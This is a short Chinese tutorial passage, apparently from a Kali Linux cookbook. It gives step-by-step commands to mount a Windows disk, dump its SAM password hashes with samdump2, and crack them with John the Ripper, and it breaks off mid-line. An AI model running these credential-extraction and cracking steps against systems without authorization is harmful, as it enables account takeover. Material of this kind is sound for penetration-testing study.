使用 John the Ripper 破解 Windows 密码

操作步骤让我们开始使用 John the Ripper 破解 Windows SAM 文件。我们假设你能够访问某台Windows 主机，通过远程入侵，或者物理接触，并且能够通过 USB 或 DVD 驱动器启动 KaliLinux。

1. 看看你想挂载哪个硬盘：

 

Fdisk -l

 

2. 挂载该硬盘，并将target设为它的挂载点。

 

mount /dev/sda1 /target/

3. 将目录改为 Windows SAM 文件的位置：

 

cd /target/windows/system32/config

4. 列出目录中所有内容。

 

ls –al

5. 使用 SamDump2 来提取哈希，并将文件放到你的 root 用户目录中的一个叫做hashes的文件夹中。

 

samdump2 system SAM > /root/hashes/hash.txt

 

6. 将目录改为 John the Ripper 所在目录。

 

7. 运行 John the Ripper：

./john /root/hashes/hash.txt

./john /root/hashes/hash.txt–f:nt (If attacking a file on a NTFS Syste